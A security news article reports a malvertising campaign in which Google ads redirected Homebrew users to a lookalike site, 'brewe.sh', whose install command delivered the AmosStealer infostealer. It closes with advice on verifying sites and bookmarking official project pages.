Fake Homebrew Google ads target Mac users with malware

Hackers are once again abusing Google ads to spread malware, using a fake Homebrew website to infect Macs and Linux devices with an infostealer that steals credentials, browser data, and cryptocurrency wallets.

The malicious Google ads campaign was spotted by Ryan Chenkie, who warned on X about the risk of malware infection.

The malware used in this campaign is AmosStealer (aka 'Atomic'), an infostealer designed for macOS systems and sold to cyber criminals as a subscription of $1,000/month.

The malware was seen recently in other malvertising campaigns promoting fake Google Meet conferencing pages and is currently the go-to stealer for cybercriminals targeting Apple users.

Targeting Homebrew users

Homebrew is a popular open-source package manager for macOS and Linux, allowing users to install, update, and manage software from the command line.

A malicious Google advertisement displayed the correct Homebrew URL, "brew.sh," tricking even familiar users into clicking it. However, the ad redirected them to a fake Homebrew site hosted at "brewe.sh" instead.

Malvertisers have extensively used this URL technique to trick users into clicking on what seems to be the legitimate website for a project or organization.

Upon reaching the site, the visitor is prompted to install Homebrew by pasting a command shown in the macOS Terminal or a Linux shell prompt. The legitimate Homebrew site provides a similar command to execute to install the legitimate software.

However, when running the command shown by the fake website, it will download and execute malware on the device.

Security researcher JAMESWT found that the malware dropped in this case [VirusTotal] is Amos, a powerful infostealer that targets over 50 cryptocurrency extensions, desktop wallets, and data stored on web browsers.

Homebrew's project leader, Mike McQuaid, stated that the project is aware of the situation but highlighted that it's beyond its control, criticizing Google for its lack of scrutiny.

"Mac Homebrew Project Leader here. This seems taken down now," tweeted McQuaid.

"There's little we can do about this really, it keeps happening again and again and Google seems to like taking money from scammers. Please signal-boost this and hopefully someone at Google will fix this for good."

At the time of writing, the malicious ad has been taken down, but the campaign could continue via other redirection domains, so Homebrew users need to be wary of sponsored ads for the project.

Unfortunately, malicious ads continue to be a problem in Google Search results for various search terms, even for Google Ads itself.

In that campaign, the threat actors targeted Google advertisers to steal their accounts and run malicious campaigns under the guise of legitimate and verified entities.

To minimize the risk of malware infection, whenever clicking on a link in Google, ensure that you are brought to the legitimate site for a project or company before entering sensitive information or downloading software.

Another safe method is to bookmark official project websites you need to visit often for sourcing software and use those instead of searching online every time.